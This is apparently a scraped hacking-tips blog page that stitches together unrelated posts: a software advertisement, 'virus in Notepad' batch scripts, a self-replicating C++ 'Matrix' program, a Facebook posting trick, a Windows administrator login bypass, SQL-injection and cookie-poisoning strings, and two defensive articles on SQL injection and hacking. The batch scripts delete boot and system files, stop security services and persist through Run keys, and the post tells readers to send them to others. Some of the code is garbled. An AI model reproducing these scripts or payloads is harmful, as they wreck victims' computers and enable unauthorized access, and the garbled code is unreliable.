Make your own Computer Software - without Programming!

Software development, isn't that the métier of a few highly trained specialists, the "inaugurated high priests of the computer"? - Not for applications as you need every day. With a new software technology, "component based software development", also software is going to become a commodity. Make it yourself and you will reap a number of benefits:

1. You get exactly the application software you want - without endless haggling with an external software developer.
2. Your application software will have much more quality and user-friendliness than you could ever get by conventional programming.
3. You save the cost of an external developer.

1st Component Design (http://www.1st-components.com) has developed a product line called "DLG", specialized in user interface (UIF), that is designed for exactly that purpose. DLG is especially useful for UIF-intensive applications, with a large number of user-interface elements and much user interaction. User-interaction - that's the most tricky part of application programming.

This economic development, that's quite natural in history. Starting out as a specialty for a few people. Via to some kind of "high tech" (as computers and software are regarded nowadays). Finally down to an everyday commodity that's open to the average user.

For example, think of the automobile technology. In the beginning, up to around 1900, an automobile was just another fad for those few who could afford it. By 1908 the Ford "Model T" came on the market, and now that technology turned to something even the average user could master. But still, particularly in Europe, automobiles required a good deal of attention, and many automobile owners hired professional drivers ("chauffeurs") to handle their cars. Not before the second half of the 20. century more and more people drove their automobiles themselves. Today, handling a car is just too simple to hire a professional "chauffeur" (except for busses, trucks, etc.)

Odds are that software will walk the same road in the years to come. System and standard software will continue to be programmed conventionally by professional software developers. Application software, however, will more and more be "plugged together" by the users (or their applier organizations) themselves.

Building software in an Application Framework like DLG (also called: 'component based software development') as a 3-step job:

1.Build a framework by combining DLG elements supporting the features you designed for the target application.

2.Make full use of DLG's flexibility to override the DLG defaults. You can do it by coding options in form of keyword parameters..

3.Only application-specific operations are left to be programmed in the conventional way. Additionally, there might be details you want to be handled in a more sophisticated way than by the DLG options. If so, you will need to program a number of callback procedures.
Visit http://www.1st-components.com: There you can download many free sample programs (+ their source code) to see that this can be done in a few code lines only, even for rather complex UIF-elements.

Read More

How make a virus in Notepad

HERE THERE R SOME EXCELLENT VIRUS SCRIPTS OF WEBS MOST DANGEROUS SCRIPTS ALSO INCLUDED IN THEM


How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**







How to stop someone's internet access::::


@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew






ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a





Freeze someone's desktop:::


this is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now in the desktop, we have 2 remove desktop icons and shortcuts, so right click on the mouse and then properties, click on desktop then select customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now to remove the shortcuts in the desktop, go to start and select My Computer, then click on c: right click on ur mouse and select new folder, write it any name
6.now go to desktop & select all da icons and right click on them then press cut,go to c: and paste them in the folder dat u created then close the window.
7.now to put the fake desktop image and remove the taskbar, so right click on desktop and gp to properties, now go to desktop and select Browse, select the file that u saved then press appply then ok. now to remove the windows taskbar, right click on the taskbar and go 2 properties, then select autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!






SHUT UR INTERNET PERMENANTLY:::


This is a slightly more advanced one. It shuts down your internet permanately. I tried it on myself accidently, i knew what it did, and it still took me a couple of days to get my internet back. works best on XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt what disables the internet permanately. It is somethinge else, that just provides a fast response to shut down any connections.


<code>@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a








MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::


Warning - Do not run it on your computer

I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;





3-save it as matrix.bat
4-finish

then compileit using diz..

http://rapidshare.com/files/172088914/QuickBFC.exe
and finally it should be matrix.exe



AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT


IF U LIKE MY POST PLZ SAY THANKS TO ME


THANKS FOR VISITING

Read More

CREATE ANTI VIRUS WITH NOTEPAD

CREATE ANTI VIRUS WITH NOTEPAD

There are simple ways to clean viruses in our computers. We can make your own antivirus with software built using the Windows named Notepad. Apart from minor product files, notepad can save files to a variety of other applications programs, such as html, java script and so on.

However, the virus that can be eliminated by our anti-virus is only a low level as macro viruses and an equal. For heavy virus, would have to use anti-virus that is more powerful. However, these tutorials can teach you the basic knowledge about how the anti-virus.

Type the following code into Notepad:

@ echo off
echo off turn off the active virus
taskkill / F / IM virusname1.exe / IM virusname2.exe
echo Deleting all of viruses based on size
for / RC: \%% a in (*. exe) do if%% ~ za 157,184 equ del / A: HSRA "%% a"
echo deleting hidden virus
echo for drive c and subfolders
for / R C: \%% a in (*. doc.exe) do del "%% a"
echo for drive d and subfolders
for / R D: \%% a in (*. doc.exe) do del "%% a"
echo Unhide Document
cd / d c: \
echo for drive C and subfolders
*. doc attrib-H-S-A / S
cd / d d: \
echo for drive D and subfolders
*. doc attrib-H-S-A / S
exit

Save the file with bat extension, For example antivirus.bat. then go to command prompt and run the Notepad file.

Read More

Log in to your computer without Password !!

When the logon Screen comes then Press Ctrl+alt+Del.Then a dialouge box will appear.
Now next up u have to write "ADMINISTRATOR" in the account name tab & then press enter.

You can apply this when you logoff also.

Enjoy




**Here is a simple way to access Windows XP with Administrator rights and privileges if you have password protected your User account on your Windows XP system and can't remember the password(s) to login.

1) Reboot your machine

2) Press F8 before the Windows boot screen appears. Do not press F5 as used on the xp or 7 ver of Windows. You will be be prompted with a boot options menu.

3) Select the Start Windows in Safe Mode option.

4) Click through several self-explanatory screens until your reach the familiar 'Welcome' screen.

Note that this welcome screen is limited to 256 colors and 640x480 resolution because the primary graphics will have been set to the Windows Safe Mode software VGA adapter. You will not be able to change this mode even in Display options, while Windows is running in Safe Mode.

5) Find the icon for the Administrator user. If the default settings of your system haven't been changed, there should be no password for this account.

6) The Safe Mode Welcome screen might display some of the other users on your system.

7) Login as the admin.

THEN SET A PASSWORD.

Read More

Facebook Status update trick

 

          This is an amazing facebook trick which you would love to use. So the trick is to update your status with name of any app like Nasa, Iphone 5, HTC etc. Still confused just follow below instruction and clear your mind.

       1. First Login to your Facebook account.
       2. Copy below link into address bar as shown in the below picture.
 
http://www.facebook.com/connect/prompt_feed.php?preview=true&display=touch&    api_key=XXXXXXXXX&target_id=YYYYYYYYYY

     
       3. In place on XXXX put api key given in below list and in place of YYYY put profile id of
           person where you want to publish your message.
       4. Now you will be redirected to new screen as above enter your message and done.


      API KEY LIST  

• Skynet (249284985083592)
• iPhone (6628568379)
• Blackberry (2254487659)
• Palm (7081486362)
• Sidekick (21810043296)
• Sony Ericsson (38125372145)
• Xbox LIVE (5747726667)
• iPad (112930718741625)
• Foursquare (86734274142)
• Telegram (140881489259157)
• Carrier Pigeon (130263630347328)
• Morse Code (134929696530963)
• Message in a Bottle (123903037653697)
• Commodore 64 (138114659547999)
• Your moms computer (132386310127809)
• TRS-80 (134998549862981)
• K.I.T.T. (129904140378622)
• Mind Computer Interface (121111184600360)
• eyePhone (110455835670222)
• toaster (203192803063920)
• microwave (0a5266c8844a1b09211e7eb38242ac2f)
• Super Nintendo Entertainment System (235703126457431)
• Gameboy Color (180700501993189)
• GoD (256591344357588)
• Glade Air Freshner (4aeb4db2e8df1cdb7f952b2269afb560)
• Strawberry (a4c9fb1708a848c2241674531176209b)
• The moon (221826277855257)
• Dr. Pepper (eea90d40e1d12565695dbbbdbd5e965b)
• Nintendo wii (243870508973644)
• Alcohol (250335888312118)
• Cheese (218791271497130)
• iPod Nano (142039005875499)
• Nintendo 64 (236264753062118)
• Microsoft Excel (242740155751069)
• Linux Ubuntu (220593361311050)
• iPhone 5g (211333348912523)
• My Bedroom (174811032586879)
• Your Mums Bedroom (5f64bbc9ac2f12b983200925da461322)
• Lamp (230755826955133)
• Your moms anus (b625297b655f0b46c86b68f754b82121)
• Refrigerator (250828364944350)
• A potato (127926427295267)
• Nasa Satellite (31d608d30292175bf7703149699ccb39)
• Vibrator (eb4c6d1a60e19a7795da501e1f468035)
• Sperm Whale (170318539700306)
• Pogo Stick (185103391549701)
• Banana Phone (1477a4cd29ec724a3de19be5d26e0389)
• Google+ (4d8243dbb7064f88351fe6c809582320)
• The Future (108372819220732)
• Smoke Signal (134138923334682)
• tin cans connected by string (242191299125647)
• Pokedex (de3da265cf6976745bb1d60a8c198151)
• Telepathy (ea01a57edb26cf1de143f09d45cfa913)
• Typewriter (d3d554bf60297cb2c384e3d7cf5a066d)
• Harry Potter (b8ebeb983f45eaa0bd5f4f66cad97654)
• TARDIS (200439256674396)
• Pip Boy (142806259133078)
• Mind Control (1dc633368924b3b0b4d08e3f83230760)
• Jedi Mind Control (240597869302110)
• Telekinesis (224139600960217)
• Post-It Note (115227201900831)
• GLaDOS (246126362083515)
• Ansible (185474028180003)
• W.O.P.R (228373497202865)
• Airwolf (123944137696757)
• HMCS Belafonte (222345601140304)
• HAPPY BIRTHDAY (60280877509)

Read More

Facebook Hacking Trick

This is a simple facebook trick. Those who know JavaScript and document object model(DOM) can easily understand this trick. This is really cool trick and trusted too. feel free to use it. 
If you know DOM and JavaScript, you can modify this code for any website you like..
Here i am showing you two magical tricks which are really funny. Try and have fun

CODE 1: EDIT facebook page and write anything you want

javascript:document.body.contentEditable=’true’; document.designMode=’on’; void 0

Paste this code to your address bar and the click on any text. Now you  will see a cursor on the web page. You can erase anything from the page or type anything on the page. Edit face book page and write what you want to write on the facebook page.
have fun 

TO stop this:  press F5 or click on refresh

CODE 2: image trick

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName(“img”); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position=’absolute’; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+”px”; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+”px”}R++}setInterval(‘A()’,5); void(0);


Paste this code to your address bar and press enter. You will see the effect of this magical trick. All images of your web page will start revolving randomly on the page..

have fun 

TO stop this:  press F5 or click on refresh

Read More

Common methods to hack a website

Gone are the days when website hacking was a sophisticated art. Today any body can access through the Internet and start hacking your website. All that is needed is doing a search on google with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking, but it has more to do with raising awareness on some common website hacking methods.

The Simple SQL Injection Hack

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.

In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a User name field:

' OR 1=1
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = ‘USRTEXT '
AND password = ‘PASSTEXT’
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ‘' OR 1=1 — 'AND password = '’
Two things you need to know about this:
['] closes the [user-name] text field.
'' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE user name = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.
Let's hope you got the gist of that, and move briskly on.
Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank,
evidently


But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:

• admin'—
• ') or ('a'='a
• ”) or (“a”=”a
• hi” or “a”=”a

… and so on.

Cross site scripting ( XSS ):

Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a websiteto gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website.

Denial of service ( Ddos attack ):

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking




Cookie Poisoning:


Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection

Both have 'OR'1'='1 or maybe '1'='1'

But in cookie poisoning you begin with alerting your cookies

Javascript:alert(document.cookie)

Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"

in this case the cookie poisoning could be:

Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");

It is also many versions of this kind... like for example

'

'1'='1'

'OR'1'='1

'OR'1'='1'OR'

and so on...

You may have to try 13 things before you get it completely right...


Password Cracking
Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it.
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.


A Few Defensive Measures

* If you utilize a web content management system, subscribe to the development blog. Update to new versions soon as possible.
* Update all 3rd party modules as a matter of course — any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
* Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
* If you have an admin login page for your custom built CMS, why not call it 'Flowers.php' or something, instead of “AdminLogin.php” etc.?
* Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability.
* Do a few Google hacks on your name and your website. Just in case…
* When in doubt, pull the yellow cable out! It won't do you any good, but hey, it rhymes.

Read More

How hack a site

I want to worry you.

I want to show you just one way that hackers can get in to your website and mess it up, using a technique called SQL Injection. And then I'll show you how to fix it. This article touches on some technical topics, but I'll try to keep things as simple as possible. There are a few very short code examples written in PHP and SQL. These are for the techies, but you don't have to fully understand the examples to be able to follow what is going on. Please also note that the examples used are extremely simple, and Real Hackers™ will use many variations on the examples listed.

If your website doesn't use a database, you can relax a bit; this article doesn't apply to your site — although you might find it interesting anyway. If your site does use a database, and has an administrator login who has rights to update the site, or indeed any forms which can be used to submit content to the site — even a comment form — read on.

Warning

This article will show you how you can hack in to vulnerable websites, and to check your own website for one specific vulnerability. It's OK to play around with this on your own site (but be careful!) but do not be tempted to try it out on a site you do not own. If the site is properly managed, an attempt to log in using this or similar methods will be detected and you might find yourself facing charges under the Computer Misuse Act. Penalties under this act are severe, including heavy fines or even imprisonment.

What is SQL Injection?

SQL stands for Structured Query Language, and it is the language used by most website databases. SQL Injection is a technique used by hackers to add their own SQL to your site's SQL to gain access to confidential information or to change or delete the data that keeps your website running. I'm going to talk about just one form of SQL Injection attack that allows a hacker to log in as an administrator - even if he doesn't know the password.

Is your site vulnerable?

If your website has a login form for an administrator to log in, go to your site now, in the username field type the administrator user name.

In the password field, type or paste this:

x' or 'a' = 'a

If the website didn't let you log in using this string you can relax a bit; this article probably doesn't apply to you. However you might like to try this alternative:

x' or 1=1--

Or you could try pasting either or both of the above strings into both the login and password field. Or if you are familiar with SQL you could try a few other variations. A hacker who really wants to get access to your site will try many variations before he gives up.

If you were able to log in using any of these methods then get your web tech to read this article, and to read up all the other methods of SQL Injection. The hackers and "skript kiddies" know all this stuff; your web techs need to know it too.

The technical stuff

If you were able to log in, then the code which generates the SQL for the login looks something like this:

$sql =
"SELECT * FROM users
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

When you log in normally, let's say using userid admin and password secret, what happens is the admin is put in place of

$username

and secret is put in place of

$password

. The SQL that is generated then looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'secret'

But when you enter

x' or 'a' = 'a

as the password, the SQL which is generated looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x' or 'a' = 'a'

Notice that the string:

x' or 'a' = 'a

has injected an extra phrase into the WHERE clause:

or 'a' = 'a'

. This means that the WHERE is always true, and so this query will return a row contain the user's details.

If there is only a single user defined in the database, then that user's details will always be returned and the system will allow you to log in. If you have multiple users, then one of those users will be returned at random. If you are lucky, it will be a user without administration rights (although it might be a user who has paid to access the site). Do you feel lucky?

How to defend against this type of attack

Fixing this security hole isn't difficult. There are several ways to do it. If you are using MySQL, for example, the simplest method is to escape the username and password, using the mysql_escape_string() or mysql_real_escape_string() functions, e.g.:

$userid = mysql_real_escape_string($userid);
$password = mysql_real_escape_string($password);
$sql =
"SELECT * FROM users
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

Now when the SQL is built, it will come out as:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x\' or \'a\' = \'a'

Those backslashes ( \ ) make the database treat the quote as a normal character rather than as a delimiter, so the database no longer interprets the SQL as having an OR in the WHERE clause.

This is just a simplistic example. In practice you will do a bit more than this as there are many variations on this attack. For example, you might structure the SQL differently, fetch the user using the user name only and then check manually that the password matches or make sure you always use bind variables (the best defence against SQL injection and strongly recommended!). And you should always escape all incoming data using the appropriate functions from whatever language your website is written in - not just data that is being used for login.

Read More

Computer Hacking

Unlike most computer crime / misuse areas which are clear cut in terms of actions and legalities (e.g. softwarepiracy), computer hacking is more difficult to define. Computer hacking always involves some degree of infringement on the privacy of others or damage to computer-based property such as files, web pages or software. The impact of computer hacking varies from simply being simply invasive and annoying to illegal. There is an aura of mystery that surrounds hacking,and a prestige that accompanies being part of a relatively "elite" group of individuals who possess technological savvy and are willing to take the risks required to become a true "hacker". An interesting alternative view of how hackers positively impact areas such as software development and hacker ideology is presented in Technology and Pleasure: Considering Hacking Constructive.
Even attempting to define the term "hacker" is difficult. Perhaps the premiere WWW resource in introducing individuals to hacking is the The New Hacker's Dictionary (http://www.logophilia.com/jargon/jargon_toc.html), a resource which encompasses everything from hacker slang, jargon, hacker folklore, writing style and speech to general appearance, dress, education and personality characteristics. According to TheNew Hacker's Dictionary, a hacker can be defined as:

1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary.
2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming.
3. A person capable of appreciating hack value.
4. A person who is good at programming quickly.
5. An expert at a particular program, or one who frequently does work using it or on it.
6. An expert or enthusiast of any kind. One might be an astronomy hacker, for example.
7. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations.
8. [deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence 'password hacker', 'network hacker'. The correct term for this sense is cracker.

Even within hacker society, the definitions range from societally very positive (dare I say characteristic of gifted and talented individuals) to criminal. In his book, "Fighting Computer Crime: A New Framework for Protecting Information" (1998), Donn B. Parker lists two basic principles hacker live by:

1. The belief that information sharing is a powerful good and that it is the ethical duty of hackers to share their expertise by writing free software and facilitating access to information and to computing resources whenever possible.
2. The belief that system cracking for fun and exploitation is ethically OK as long as the cracker commits no theft, vandalism or breach of confidentiality.

Parker differentiates between benign and malicious hackers based on whether damage is performed, though in reality all hacking involves intrusion and a disregard for the efforts, works and property of others.

Ways to Minimize Potential for Hacking

There are a number of ways for schools to minimize potential for hacking.

1. Schools need to clearly establish acceptable use policies and delineate appropriate and inappropriate actions to both students and staff.
2. Students and staff need to instructed regarding hacking, the mentality associated with it, the consequences of various hacking actions and possible consequences of interacting and forming online relationships with anonymous individuals who claim to be proficient in invading others' privacy.
3. The use of filters may be considered in reducing access to unauthorized software serial numbers and hacking-related materials, newsgroups, chatrooms and hacking organizations.
4. Teachers need to be aware of student activities in the computer labs and pay special attention to things they hear in terms of hacking behavior.

 

Read More